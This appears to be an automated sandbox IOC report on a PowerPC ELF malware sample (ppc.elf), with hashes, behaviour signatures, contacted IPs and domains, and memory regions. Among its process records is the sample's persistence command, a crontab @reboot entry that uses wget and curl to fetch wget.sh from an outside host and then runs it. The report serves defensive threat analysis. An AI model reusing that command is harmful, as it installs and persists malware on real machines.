Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

ppc.elf

ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
Entropy:	6.262840640121452
Filename:	ppc.elf
Filesize:	77608
MD5:	0b7d29b9cd26113d2540ce43f07a2043
SHA1:	be337137f850b55d14a9b547d890238d478dc5fa
SHA256:	a782bcfea22e233256ec6f536cc5f06d007dac34b1bdb37f56b75913cc9013b3
SHA512:	28086d327396e62cb07b1995e854ab86947f8f4435d4386770ca577f6bc098e07399841fe298f1f2c5d5d642b702babe0702cf02ef4693d482a84f97a096be32
SSDEEP:	1536:uoQ4z72gxzc7xeMthFmldGdkqer3W1qI4Zte9Wq0CwER1:u27Hq1tqy0r3W4I4aLB1
Preview:	.ELF...........................4..-H.....4. ...(......................)\..)\..............)`..)`..)`......T.........dt.Q.............................!..\|......$H...H......$8!. \|...N.. .!..\|.......?.........-\|..../...@..\?.....)\|.+../...A..$8...})....)\|N..

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Enumerates processes within the "proc" file system	Persistence and Installation Behavior	OS Credential Dumping
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior
Sample listens on a socket	Networking
Sample tries to kill a process (SIGKILL)	System Summary
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion	Security Software Discovery

/var/spool/cron/crontabs/tmp.gfYg0o

Unknown

dropped

Details

File:	/var/spool/cron/crontabs/tmp.gfYg0o
Category:	dropped
Dump:	tmp.gfYg0o.19.dr
ID:	dr_0
Target ID:	19
Process:	/usr/bin/crontab
Type:	Unknown
Entropy:	5.154442544229458
Encrypted:	false
Ssdeep:	6:SUrpqoqQjEOP1KmREJOBFQLYoi6vZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKw:8QjHig8UHMeHLUHYC+GABjnOGAFkz
Size:	306
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior

Processes

Path

Cmdline

Malicious

/tmp/ppc.elf

/bin/sh

sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

/bin/sh

/usr/bin/crontab

crontab -l

/bin/sh

/usr/bin/crontab

crontab -

/tmp/ppc.elf

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.Tjs0sEmo3a /tmp/tmp.K00P5cWEpn /tmp/tmp.ZeekXPAEm7

There are 7 hidden processes, click here to show them.

URLs

Name

Malicious

http://hailcocks.ru/wget.sh;

unknown

Details

Name:	http://hailcocks.ru/wget.sh;
TargetID:	19
From Memory:	true
Current Path:	/usr/bin/crontab
Source:	tmp.gfYg0o.19.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

Domains

Name

Malicious

kingstonwikkerink.dyn

88.151.195.22

IPs

Domain

Country

Malicious

54.171.230.55

unknown

United States

Details

IP:	54.171.230.55
TargetID:	-1
Country:	United States
Countrycode:	USA
ASN number:	16509
ASN name:	AMAZON-02US
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

194.87.198.29

unknown

Russian Federation

Details

IP:	194.87.198.29
TargetID:	-1
Country:	Russian Federation
Countrycode:	RUS
ASN number:	49352
ASN name:	LOGOL-ASRU
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

81.29.149.178

unknown

Switzerland

Details

IP:	81.29.149.178
TargetID:	-1
Country:	Switzerland
Countrycode:	CHE
ASN number:	39616
ASN name:	COMUNICA_IT_SERVICESCH
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

109.202.202.202

unknown

Switzerland

Details

IP:	109.202.202.202
TargetID:	-1
Country:	Switzerland
Countrycode:	CHE
ASN number:	13030
ASN name:	INIT7CH
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

91.149.218.232

unknown

Poland

Details

IP:	91.149.218.232
TargetID:	-1
Country:	Poland
Countrycode:	POL
ASN number:	198401
ASN name:	GECKONET-ASPL
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

91.189.91.43

unknown

United Kingdom

Details

IP:	91.189.91.43
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.42

unknown

United Kingdom

Details

IP:	91.189.91.42
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

558c72dac000

page execute and read and write

7f2f08df3000

page read and write

558c72dc2000

page read and write

7f2e1402a000

page read and write

7ffe6974f000

page read and write

7f2e14024000

page read and write

7f2f0992a000

page read and write

7f2f09444000

page read and write

558c73cdf000

page read and write

7f2e14024000

page read and write

7f2f098e5000

page read and write

7ffe697aa000

page execute read

558c72dac000

page execute and read and write

7f2e1402a000

page read and write

7f2f098e5000

page read and write

7f2f09444000

page read and write

7f2f085e2000

page read and write

7f2f098dd000

page read and write

7f2f04000000

page read and write

7f2f08df3000

page read and write

7f2f0992a000

page read and write

7f2f09082000

page read and write

7f2f097b4000

page read and write

7f2f09469000

page read and write

7f2e14014000

page execute read

7f2f04000000

page read and write

7ffe697aa000

page execute read

558c70da6000

page read and write

558c73cdf000

page read and write

7f2f085e2000

page read and write

558c72dc2000

page read and write

558c70b23000

page execute read

7f2f04021000

page read and write

7f2f098dd000

page read and write

7f2f09082000

page read and write

7f2f08de5000

page read and write

7f2f04021000

page read and write

558c70dae000

page read and write

558c70b23000

page execute read

7f2f08de5000

page read and write

7f2f097b4000

page read and write

558c70dae000

page read and write

7f2e14014000

page execute read

7f2f09469000

page read and write

7ffe6974f000

page read and write

558c70da6000

page read and write

There are 36 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
ppc.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportppc.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
ppc.elf